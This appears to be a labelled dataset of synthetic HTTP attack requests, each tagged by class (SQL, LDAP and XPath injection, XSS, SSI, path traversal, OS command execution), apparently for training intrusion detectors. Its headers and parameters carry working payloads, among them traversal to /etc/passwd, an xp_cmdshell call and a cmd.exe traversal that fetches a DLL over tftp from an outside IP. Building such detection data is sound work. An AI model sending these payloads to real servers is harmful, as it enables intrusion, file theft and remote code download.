GET /V1dncc/hriN8or/x5WMDb_IJuR/5nd/itewgiatxnlm2oySi/5i0pEsLx/1mstl9t/oWries/-Z9HbadminB49WNGal4.swf?HcFe-nullV=vhEZw&engr5emyerdrams=777578++or++++id%3E9+++or++ls_id%3C2599&fgWaatlsramEl=+hitcowi2it&sevn6f1eptteHoa=esOmochaquoem%3Ftbuli&dn5t7c5aswd=sF&oQw64=lQq HTTP/1.0
Host: 153.64.136.40
Connection: keep-alive
Accept: video/quicktime, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, identity;q=0.6
Accept-Language: *;q=0.8
Cache-Control: min-fresh=765
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="17"
Date: Fri, 16 May 08 02:57:02 UTC
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: ehijolan=e1baq
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Wed, 23 Jan 08 15:37:51 CET
If-Unmodified-Since: Sun, 13 May 07 10:49:07 CET
If-Match: *
If-None-Match: *
If-Range: "xTzakPSmG.D.Q2WIE"
Max-Forwards: 0
MIME-Version: 9.3
Pragma: ulhd=ttrs
Proxy-Authorization: Basic UmNucHNycjpwcmVyc3Vi
Authorization: Basic aW5lZEJ0RTpldGdubw==
Range: -58,988-4242
Referer: /zsfny/Wvhsbe4.jpg
TE: trailers,deflate
Trailer: Warning
User-Agent: vpulh (eJkZlXtpP; e7g@r5dm; d0s2Ebd7UV; 6PPyflM; aR1fr.iJw0)
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 6.5 15.102.10.152, FTP/3.7 31.11.82.172, 6.4 www.3eztIizt.htm
Transfer-Encoding: deflate
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 999 147.111.219.75 "f2re1Ss" 
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42385
Start - Id: 46469
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: www.rato2ahoo.org:09073
Connection: nhdSt
Accept: image/*, audio/*;q=0.3, image/jpeg;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 212.173.22.144
Cookie2: $Version="1"
Date: Fri, 23 Jul 04 24:55:24 UTC
ETag: "TClpSRyVRpjXpah"
From: oeed@ro5sY.uk
Max-Forwards: 75
Pragma: itt=irn
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: NTLM b3BpbWN0dDR0dW5pQ0kxaGllbmV0VW9vdGE4c1VubW4w
Range: -540
Referer: http://www.keisg.st/henti/btmkcm.nsf
TE: trailers,gzip
User-Agent: ebmcl8hao/1.1.1
Transfer-Encoding: deflate

null

End - Id: 46469
Start - Id: 48203
class: XSS
POST /n0eaEs/nejMbym/ni/iu_Mu1JZ@LEf/tkereEJiatni3dRlt.shtml? HTTP/1.1
Content-Length: 171
Content-Language: grIom,ee,ecAzmhni
Content-Encoding: deflate
Content-Location: /dehml/hpriX.rar
Content-MD5: d3NoemFFcEFpYUF2ZGVhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Nov 04 24:47:01 GMT
Last-Modified: Sun, 23 Jan 05 21:03:31 GMT
Host: www.nhus.com
Connection: close
Accept: image/jpeg;q=0.6, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: <div   style  =   "     behaviour: url([http://www.mand.com/script/mae1.cfm]);   "   >
Cache-Control: max-stale=90
Client-ip: 198.54.180.201
Cookie: oHswytEacae=0438806762;Va18ujxee=lermocharrfathept 7tmr ;jH3accept=r8rIceobshttp1s(r
Cookie2: $Version="058"
Date: Sat, 19 Dec 09 06:22:26 UTC
ETag: W/"Fl5QW29xoF4.serjG2sz"
Expect: 100-continue
From: nio6@slo8Cr.fr
If-Modified-Since: Wed, 14 Oct 09 09:28:31 CET
If-Unmodified-Since: Fri, 08 Jul 05 11:53:21 CET
If-Match: "Q.cuy-u.-irWf.YI7fB"
If-None-Match: "kEDcfSGTrOO11J.Mfy5A"
If-Range: "2n6g6_sqE@qnWZz"
Max-Forwards: 41
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest username="moie1"
Authorization: Digest algorithm=MD5-sess
Range: 86-
Referer: http://daedez.de/y8hce/nbldenot/2cor.jpeg
TE: trailers
Trailer: If-Range
User-Agent: lTc85he/7.0.2
UA-CPU: PowerPC
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0833x5233
Via: 2.7 133.128.81.190, 2.3 214.235.128.13:27
Transfer-Encoding: deflate
Upgrade: nw3/1.2, Eccue/9.3, dnaeM/4.7, yeug/4.3
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

r9eeemdtbteaa=yfjueTbo88H&ha3aaentIr1=Ht4S7>sd&eoormge=wqtn9Y&alierhet=pfotsoneigssomnn&ZfhphpF=7 afi&igehcsayoot=xway0ddia ftptfroms c4pm[r&hx=34900&rsat=h0iz0nJ Cqcw

End - Id: 48203
Start - Id: 46027
class: PathTransversal
GET /eOBebXP/h2gbe1p1sesui.aspx? HTTP/1.0
Host: www.v6btd.biz
Connection: rhl5dAat
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 63.83.38.140
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="31"
Date: Sat, 26 Aug 06 11:25:57 UTC
ETag: W/"i@2cdKd_4ft0aj1MXmjj"
From: eircind@aorae.fr
If-Modified-Since: Wed, 04 Mar 09 01:41:33 GMT
If-Unmodified-Since: Sun, 31 Dec 06 24:28:32 CET
If-Match: "zvPzJTTfB@SBYNegGy"
If-None-Match: *
If-Range: Fri, 19 Jun 09 06:32:08 CET
Max-Forwards: 0
Pragma: no-cache
Authorization: Basic ZWU1YWg6bmVnaWhl
Referer: /fnSsi.jpeg
TE: chunked;q=0.7,deflate
Trailer: If-Range
User-Agent: ../../../../var/log/access_log%00.html
UA-CPU: Sparc
UA-OS: Windows NT
UA-Color: color16
Via: 7.1 www.anmleds.js:45
Transfer-Encoding: compress
Upgrade: SnetBt/9.0, lhEp/0.1
Warning: 793 www.tyrd.shtml "8ufoatiglFcqs3etd" "Mon, 28 Jan 08 03:54:45 UTC"
X-Forwarded-For: 20.101.217.179
----: ----------------

null

End - Id: 46027
Start - Id: 36549
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: www.flct.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.1, deflate;q=0.6, identity;q=0.3, deflate;q=0.4
Accept-Language: *
Cache-Control: max-age=16230
Client-ip: 131.100.188.215
Cookie: qs=uylstdmiwomnbcot;oremna4d=027;ee=blUjZzImGg;ie0wtsaeltnD=1
Cookie2: $Version="7"
Date: Sat, 18 Oct 08 12:06:30 CET
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Wed, 08 Apr 09 01:47:41 UTC
If-Match: "nAj6kUk7xKqAQ0qNL1"
If-None-Match: "6s3cP9mHhcyMDpC6_qW@"
If-Range: Sun, 16 Jan 05 02:13:17 CET
Max-Forwards: 51
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: Digest nc=CEfE43E3
Range: -7292
Referer: /riehe.cgi
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 4.4; eg-ld; rv:7.6.5) Gecko/80562261
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: 2.3 95.104.251.20, 1.1 www.iannq.jpeg:79560
Transfer-Encoding: compress
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36549
Start - Id: 44721
class: PathTransversal
POST /hseaeuoree/oiO_ZilnTl/fPp_/ya/@systemAKTwcatgservices/ra/lSLUUZS4-SgeyRens7Br/zae8f09hTte55r/ycot/gohotahoetscbn/8dxPoocMcDkis@eUiFB.gif? HTTP/1.0
Content-Length: 40
Content-Language: wtrt
Content-Encoding: gzip
Content-Location: /bvpti/o6keerH/tcsr/t7modf/hdeae.jpeg
Content-MD5: bDR0c2tld2FqYXJwY2F0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Feb 04 09:35:48 CET
Last-Modified: Tue, 27 Oct 09 15:46:47 GMT
Host: 23.131.70.5
Connection: close
Accept: audio/x-wav;q=0.7, image/*;q=0.1
Accept-Charset: iso-8859-4
Accept-Encoding: identity, gzip, deflate;q=0.7, compress;q=0.0, identity
Accept-Language: tdheor-tetz2m
Cache-Control: id='shdstNe'
Client-ip: 52.223.132.52
Cookie: ss7e=H(iitsoc2l;ajByyiuwlww2sqI=34990;4scriptGL4=69-Mw9BWgy;eSb=6unaETsists;euosepotEntCkes=eid9n;nglta9t9ws=%]o
Cookie2: $Version="777"
Date: Tue, 24 Apr 07 24:40:31 UTC
ETag: W/"yCLt4vwNhscQwwl0"
Expect: c8oa2ru
From: eeisiew@psau3afeg.net
If-Modified-Since: Sat, 28 Jun 08 18:53:00 GMT
If-Unmodified-Since: Fri, 19 Jan 07 21:46:30 CET
If-Match: "RSNi_x5sM8f3uBOPU"
If-None-Match: "9vPZmO9J3oxN-G.Xx"
If-Range: Sat, 23 Feb 08 14:11:33 UTC
Max-Forwards: 97
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic eWxhczppYVZzb3Jmaw==
Authorization: jgcsu Cefpahao=taAcang
Range: 8542-,-709
Referer: /dEsn8aB/6ttd/l6rs.wmn
TE: chunked,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Windows; U; WinNT 9.5; tc-te; rv:9.0.0) Gecko/46010309
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 253x4084
Via: HTTP/6.3 237.31.194.84:9092
Transfer-Encoding: ieem
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 548 48.64.9.229 "1rslwi8n3tavcnajanu" "Fri, 11 Sep 09 17:43:47 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rjQJ_nph-r=./../../../../../

End - Id: 44721
Start - Id: 37593
class: LdapInjection
POST /8lotsertea7tdei/NY/hT3eNSD.X_/sZR3IACFaD0gDtu/rcaoe/atvosct1druIrqecR/bmov5dcrAtf/e-NwdW96ZB5ZvIdHLpJ/qjSTgd4lservicesT.shtml? HTTP/1.0
Content-Length: 77
Content-Language: maen3c,rfsran,libzK
Content-Encoding: compress
Content-Location: /6sdnr3o/oeesieua.pl
Content-MD5: eXByaWFyaWlvN2llZXJyMA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Oct 09 05:32:55 CET
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: 248.237.139.71
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity, deflate, deflate;q=0.3
Accept-Language: *
Cache-Control: max-age=99778
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Wed, 16 May 07 04:51:29 UTC
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Mon, 28 Dec 09 05:38:21 GMT
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: "_2iLNjimjFiR.nQL"
If-Range: Mon, 05 Jun 06 21:42:35 GMT
Max-Forwards: 844
MIME-Version: 4.3
Pragma: traeah='0'
Proxy-Authorization: Digest qop=Sogaol
Authorization: Basic Z2FqcnQ6b2lpMmU=
Range: 3-46,1783-444359
Referer: /grhaerd/abl9/cDslaael/DFfy/TLeDte.css
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: sHCyq9OEbm http://www.ipifli.org
UA-CPU: PowerPC
UA-Disp: 0007,792,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4454x553
Via: 1.3 251.12.24.108
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ityxwroashrg1hs=whcoqR6eoirn&dssrnhwor3i=s&ed=apa)(    | (esza=*)

End - Id: 37593
Start - Id: 49413
class: XPathInjection
GET /mpAN7I/bjMuJZf/zmU@IEC.khsjVc/Ytfroo/tdftuta7ssa/5.S/o@iWFF3pT/giVk3kBuhQeo-/JWSZLd/br_Vmw816x.nsf?@A9YDhHg1LbO=4++++or+++cdaot%2Fnu%2F5satll%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D91%5D++++or+++1655%3D&ncNr7mtm7m=72&iemdeta95eSge=smE%29tjp%25%5Ct&nbketmtm0at=iaEo&ieuRte=inode8&er=i6tuhee HTTP/1.1
Host: 241.33.204.117:80
Connection: ioii
Accept: */*
Accept-Charset: x-mac-japanese, iso-8859-9, utf-7
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="9"
Date: Sun, 03 Sep 06 08:04:46 UTC
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: 100-continue
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Fri, 22 Dec 06 12:56:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 77585-376599
Referer: /hdeR.avi
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 8.2; e7-31; rv:6.0.2) Gecko/71520126
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: deflate
Upgrade: dec/5.5, 4kklt/1.7
Warning: 222 29.185.139.144 "meri5fe" "Sun, 16 Aug 09 09:30:25 UTC"
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49413
Start - Id: 39093
class: LdapInjection
PUT /t9cpe5efezueni/di2tBrxhhY8sXF.Hr/rmu@BE0x5sKd/Dbzt8tdebTuycrf2c02/TcvIPy1./eloidprtwaEGnzieoem/6IrZJjr-@1R/XlsJUX/s9jKeSoV3Dw/tsrsshnb/Ci/sWbtQQlGk0.png? HTTP/1.0
Content-Length: 235
Content-Language: d,esnre
Content-Encoding: compress
Content-Location: /oSilatgS/dsOe/iDtae/OUeaw.fgf
Content-MD5: Tm4yaG5lZm82bnF0bUV0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Dec 04 09:35:01 GMT
Last-Modified: Sat, 13 Aug 05 09:36:28 GMT
Host: www.oeEr.st:346
Connection: jotpa
Accept: image/*, text/*;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cookie: crzret=8ti6teacmorlsta;oounnvT1=863068441;ljrnoteeoEsoe=thtaccesDlhopt+3dejnph-insert~linkSog+i;soty4ns3z=al1hidg%winnt;zdeletestyle cr ;YQqwhv.Sl=27)(&(objectClass=ans)(|(sn= arie)(cn=n     J*));3odri1onpt=bbGm
Date: Wed, 06 Oct 04 07:30:00 GMT
Expect: iahcQs
If-Modified-Since: Thu, 10 Aug 06 05:54:35 CET
If-Unmodified-Since: Thu, 10 Jul 08 12:52:36 GMT
If-None-Match: "@FsvwdQ32LpNoN@SL6b"
If-Range: Thu, 18 Feb 10 03:27:12 CET
Max-Forwards: 080
Authorization: Basic SGFlNWZ6OnRnaXJ3
Referer: /5Lqjg/pwaheIa.cgi
TE: deflate;q=0.3
Trailer: Warning
User-Agent: Mozilla/8.3 (compatible; MSIE 2.7; Mac OS X; neinc0dbe)
UA-CPU: MIPS
Transfer-Encoding: mjaC
X-Serial-Number: 3517637301815
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

9bssshpiKdltef=@&yCai=37556289&sol= ef:systemBincludeqd&eYmenk=null&27qumIv=71963&roiueunEZ=2839&rebmeiraae=eohoheiI&tdmp1hurtooek=lwindow.open@updateisk5e]ai$lly? ine&aAadaa=3ecs&Nnete3et=nE9AEre9lk&ifEs=763611&sR3xkc4p=dt

End - Id: 39093
Start - Id: 38398
class: LdapInjection
GET /waHcsLTb-d/tY2m/icu2Pvaa3.htm?tor=%29+%28++++%7C%28displayName%3Dhad*%29+++%28name%3D++++had*%29%28+mail%3Dhad*%29 HTTP/1.0
Host: 51.80.160.238
Connection: eti6lTt
Accept: */*;q=0.6
Accept-Charset: iso-8859-4;q=0.9, iso-8859-1;q=0.5, iso-8859-15;q=0.8, utf-8
Accept-Encoding: 
Accept-Language: hd-6os;q=0.6, aws3tatt-smertoab, ouWru-aimhlhs;q=0.5
Cache-Control: only-if-cached
Client-ip: 214.154.43.120
Cookie: muae=oby;Mnodeyposition2=sze;f_RZHJG96cS=170351
Cookie2: $Version="22"
Date: Tue, 20 Apr 10 09:43:01 GMT
ETag: W/"QfRpXLxEGDTgWWni"
Expect: 100-continue
From: bahiT@etI8o.net
If-Modified-Since: Sat, 17 Mar 07 10:25:49 UTC
If-Unmodified-Since: Wed, 28 Nov 07 13:09:17 GMT
If-Match: *
If-None-Match: "aArLISgjwm7L9c4IRDy"
If-Range: *
Max-Forwards: 022
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: Digest nc=d7bc844A
Range: -96373
Referer: /eemiassc/ieeyw/hlest/toeb.jpg
TE: deflate
Trailer: Trailer
User-Agent: paRe/2.4.3
UA-CPU: Sparc
UA-Disp: 011,9897,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: 4.8 88.241.245.135:24, 8.1 108.187.220.135:5
Transfer-Encoding: compress
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38398
Start - Id: 46448
class: PathTransversal
POST /eelondghutoE/dehRif/F2ZU/iuTmy/awoa/lkA/uOMYuFu/mjmWx6T9pUNT.nsf? HTTP/1.1
Content-Length: 181
Content-Language: iwl,3e36t
Content-Encoding: compress
Content-Location: http://www.teesE.com/8izeo/lcyi/e6eene7m.php4
Content-MD5: ZHN6RDJwZXJvdkw5dWh0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jan 08 23:48:43 CET
Last-Modified: Thu, 18 Aug 05 01:16:08 CET
Host: 210.143.237.181
Connection: close
Accept: application/*;q=0.1, application/postscript
Accept-Encoding: 
Accept-Language: *
Client-ip: 157.167.51.59
Cookie2: $Version="1"
Date: Tue, 15 Mar 05 02:03:44 CET
Expect: 0ieees=ReaztMc;lrbnla
From: loodnb@lWtvfSw.uk
If-Unmodified-Since: Sat, 24 Jan 09 02:42:29 CET
Max-Forwards: 5
Authorization: e3nt wi6ssk2=9peat
Referer: http://lw2s7aib.com/nusEls/jsev0vxa/enL2e/lGconafa.pl
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Via: rsmfg/4.5 109.29.158.204, FTP/1.3 106.1.195.219
----: --------------------------------------------------

53CNtwtstcO=0013976&dswa0sai=br&omr9tietpieres=llOat&ehujHnme=egyeitEso4nh&teyrnisie1enn=u0dsf&tetp=:ost&5iegeaEjs=4&q6Fs-0Wl=@etliddsdgtl&oattaiNa=02&spe3diwwxi=aawl2oeekmHesee

End - Id: 46448
Start - Id: 35280
class: SqlInjection
GET /rsnbEt/r-fa/dG0nehcEd8bfi5httbp/ou73fKuapUm0/nneinEeixoT7heen/ey/e33-5jj.X6Pdhq7-s5/afroAb7eaLtmdotni/dIRIh4TjTDa0BIbt@zxr/sYkBJe/b74yyVgUw.ab/o6MfV9xu0oAr.asp?rtlh2nngf=0989498&obhrmeeoemanhoe=0423646&z9uRFJo06=s%27++UNION++++ALL+++++SELECT++z6++++FROM+prH6s8+WHERE+++%27%27%3D%27 HTTP/1.1
Host: 151.175.165.166
Connection: keep-alive
Accept: application/postscript;q=0.1, text/xml;q=0.3, application/*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: hla-l, noeores-sa0e
Cache-Control: only-if-cached
Client-ip: 155.132.155.102
Cookie: 2icmaPHf=cUaryi;Qss3=417665
Cookie2: $Version="2"
Date: Sun, 14 Nov 04 22:10:01 UTC
ETag: W/"K-NkvRrlLf6gBjMEc3V"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: B9ir@tOlwn.gov
If-Modified-Since: Sat, 07 Aug 04 01:41:11 GMT
If-Unmodified-Since: Thu, 14 Apr 05 21:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Feb 06 19:09:52 UTC
Max-Forwards: 664
MIME-Version: 8.3
Pragma: ptUn=nl
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://de6d4R.st/nrdophhs/rafidB1/Mgsrf7u/nste0r/ihnea.js
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 4.5; pr-sb; rv:3.3.4) Gecko/74338073
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/0.1 www.diesfe.gif:9
Transfer-Encoding: compress
Upgrade: caha/7.7
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35280
Start - Id: 39496
class: SSI
GET /yns@2/i7g1kKQCt1.X/bx38EQ86gs_iIYtb.sh?t6t=6&anmufsoonrHo=8814&haj0e=941&osi=3958625309&u2Ti9nAt=wcniSin5pmahoig&nz=rrV&mltswy=n%27+&ttns0h=imGax9Z&snElthsaw=rjbQ-xbP0glF&tiuz=%28processing-instructionaiI&sreostdoedrhi=tJt4_h&emol6petn=ttSnerhufortaHq&wmdb0ses=7&tasfa=uhss9anuor4ax5i HTTP/1.1
Host: 252.2.62.231
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: <!--    #include    virtual="/etc/httpd/httpd.conf"  -->
Accept-Language: *;q=0.1
Cookie: Qkwd=h0kHpYt;e7nshi1ihi=hrCOiBry2eieeHduss;mhee=5;we1tteTioenheei=on;a2ne3Htnr=hKU;oomNs1Dachq6ta=isinsertnaing na6t8nsr
Date: Fri, 14 Apr 06 03:49:21 GMT
ETag: W/"JYF3.So1.2DN3AcL4K80"
If-Unmodified-Since: Sun, 25 Jun 06 21:31:58 UTC
Max-Forwards: 143
Referer: /gano/hteEne/8s5tris.pl
User-Agent: Mozilla/1.1 (Windows; U; Win98 3.9; eu-do; rv:2.7.6) Gecko/61142455
Transfer-Encoding: ecoxe
----: -----------

null

End - Id: 39496
Start - Id: 42940
class: OsCommanding
GET /nru14jwE.bin?hntesrvhhPcnt=eodsoamrruaerh&MJdZ0fjXwi=xmlrst%3Baen&tj8W=91612&56rteeenco=e-Qj&1ocOlteSjetcino=rh.wlxG HTTP/1.0
Host: 126.94.13.203
Connection: keep-alive
Accept: text/plain, audio/*, application/zip;q=0.9
Accept-Charset: x-mac-arabic;q=0.6, ks_c_5601-1987, utf-7, euc-cn, euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: olN3xsih='e'
Client-ip: 117.172.196.9
Cookie: jEtiritesomE9s=anw7sit;ou3tz6a=1986369;nysCom=oJiHKXKB
Cookie2: $Version="9"
Date: Wed, 02 Jan 08 19:45:43 CET
ETag: W/"4sVM@HcAB.Ln9w@l9gN"
Expect: 100-continue
From: 3aheja@ties8On.biz
If-Modified-Since: Tue, 21 Aug 07 07:43:54 CET
If-Unmodified-Since: Thu, 29 May 08 06:04:42 CET
If-Match: *
If-None-Match: "rf5ECoaXOoU2CsaYS11Y"
If-Range: "cU71j9SvrBCVG8Jx6"
Max-Forwards: 9069
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ihsrran"
Authorization: atago sztecibe=ef5eo3e
Range: 01418-88080,370072-
Referer: /txer1DT/tkh8Bnr/4rwindhw/nyrnnw.php4
TE: deflate
Trailer: Referer
User-Agent: |  ps     -auxwww     ;
UA-CPU: PowerPC
UA-Disp: 810,554,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 512x475
Via: HTTP/1.2 211.82.97.82
Transfer-Encoding: identity
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42940
Start - Id: 35070
class: SqlInjection
PUT /1YOvHfHpJ0n/dFRmS2ep8GiSjqB3rNCG/Tniapadsohslrmthhm.nsf? HTTP/1.1
Content-Length: 218
Content-Language: wsa8hui,7I,ciatiu
Content-Encoding: deflate
Content-Location: http://cgTyhur.net/belat3/tatAko4/tameena/0euoedow.avi
Content-MD5: c3JzNXdlQmREYXNucDRsbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Mar 10 15:33:22 UTC
Last-Modified: Fri, 29 Dec 06 07:21:18 CET
Host: www.idue.cz
Connection: deet
Accept: */*
Accept-Charset: hz-gb-2312;q=0.9, iso-2022-kr;q=0.1, iso-8859-3;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 74.20.0.92
Cookie: Haa7nlv=6632494;uuorwE2ene=VHI;teE=saml;aa;aXilaa=texecen
Date: Tue, 16 Nov 04 23:48:06 CET
ETag: W/"HTd0hhXI2Fjo@so"
Expect: 100-continue
If-Modified-Since: Thu, 28 Aug 08 16:55:07 CET
Max-Forwards: 0
MIME-Version: 6.9
Pragma: no-cache
Authorization: dehthi vjmi=carmtess
Referer: http://www.cpEbt5.cz/eneoHZ/p4rc/lchir27.asmx
TE: trailers,trailers
User-Agent: ';EXEC    master.dbo.xp_cmdshell    'cmd.exe
Via: 2.1 www.tdnern.png:5998, 6.2 222.67.125.77:3208
X-Serial-Number: 9478526413900
----: -------------------------------

tieuamxs=aia5&ecdheeacce=bo&oFuxi=Kaa&pLacceptDaB@ZKbcatQ= tipl&ahzcb6=efailest&orpoa6iepu2te=ysylln&talthr=Aet&nluntupoIMASedd=09&RXIlsHhR=9480&yrsa=056323&oagru3esngsI=5406893&lvcoc=hoe5s6gsctlt&mh9b5orSaFtooir=nPpfi

End - Id: 35070
Start - Id: 49894
class: XPathInjection
GET /J_ESnMinputftpscriptPi/8ebHfRTJdfbY/a6@7you9JyREXgLK1/ctoR1lnqxej6esnOho/eNl2ougyr/d4ny9gWECB6JFE/uMidteem0e/documentXrtqcopya9ap4TQRU.jpeg?lo5o=gfMYWARf0&iG=se%27%5D+++%7C+++P+++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28++++%29++%3D++%27a5rMc HTTP/1.0
Host: www.s5vyan.org:80
Connection: iexhwEng
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-chinesetrad;q=0.2, iso-8859-15;q=0.8, cp-950;q=0.8, windows-1253
Accept-Encoding: gzip;q=0.7, deflate;q=0.9
Accept-Language: ts-hwqbs, he2-l, Et-md, ty-r;q=0.9
Cache-Control: max-age=79429
Client-ip: 30.98.150.84
